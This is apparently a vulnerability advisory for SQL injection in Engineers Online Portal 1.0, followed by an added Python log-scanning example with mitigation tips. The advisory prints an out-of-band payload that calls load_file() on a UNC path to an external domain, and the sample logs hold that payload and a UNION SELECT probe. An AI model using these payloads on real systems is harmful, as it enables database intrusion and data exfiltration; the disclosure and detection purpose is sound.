# Exploit Title: Engineers Online Portal 1.0 is vulnerable to three types of SQL injection attacks.
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 10.13.2021
# Vendor: https://www.sourcecodester.com/users/janobe
# Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html

[+] Exploit Source:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101321

[+] Description:
The id parameter from my_classmates.php on the Engineers Online Portal app appears to be vulnerable to three types of SQL injection attacks: boolean-based blind, error-based, and UNION query.
The payload '+(select load_file('\ hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+' was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The user login is also vulnerable to an SQL injection authentication bypass through the "username" parameter.

----------------------------------------------------------------------------------------
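
One way to look for the id-parameter payload described above in web server access logs, as an added example that is not part of the original advisory or the author's exploit code. The log format, the `/eop/` path, the indicator list and the placeholder host `oob.example.invalid` are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators derived from the advisory's description of the id payload:
# a sub-query calling load_file() on a UNC path, plus the UNION variant.
CHECKS = [
    ("load_file call", re.compile(r"load_file\s*\(", re.I)),
    ("sub-query", re.compile(r"\(\s*select\b", re.I)),
    ("UNION query", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("UNC path", re.compile(r"\\\\[\w.-]+\\")),
    ("quote in id", re.compile(r"['\"]")),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format); not captured traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Oct/2021:10:00:00 +0000] '
    '"GET /eop/my_classmates.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Oct/2021:10:00:07 +0000] '
    '"GET /eop/my_classmates.php?id=%27%2B(select%20load_file('
    '%27%5C%5C%5C%5Coob.example.invalid%5C%5Cx%27))%2B%27 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Oct/2021:10:00:09 +0000] '
    '"GET /eop/my_classmates.php?id=12%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 5120',
]

def inspect_line(line, page="my_classmates.php", param="id"):
    """Return the names of the indicators found in `param` of a request to `page`."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + page):
        return []
    # parse_qs percent-decodes the value and maps '+' to a space, as PHP does for $_GET.
    values = parse_qs(url.query, keep_blank_values=True).get(param, [])
    return [name for name, rx in CHECKS if any(rx.search(v) for v in values)]

def scan(lines):
    """Return (line_number, indicators) for every line with at least one hit."""
    hits = ((n, inspect_line(line)) for n, line in enumerate(lines, start=1))
    return [(n, found) for n, found in hits if found]

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
```

On the database side, MySQL's `secure_file_priv` setting restricts what `LOAD_FILE()` can read, and parameterized queries in the PHP code remove the injection itself.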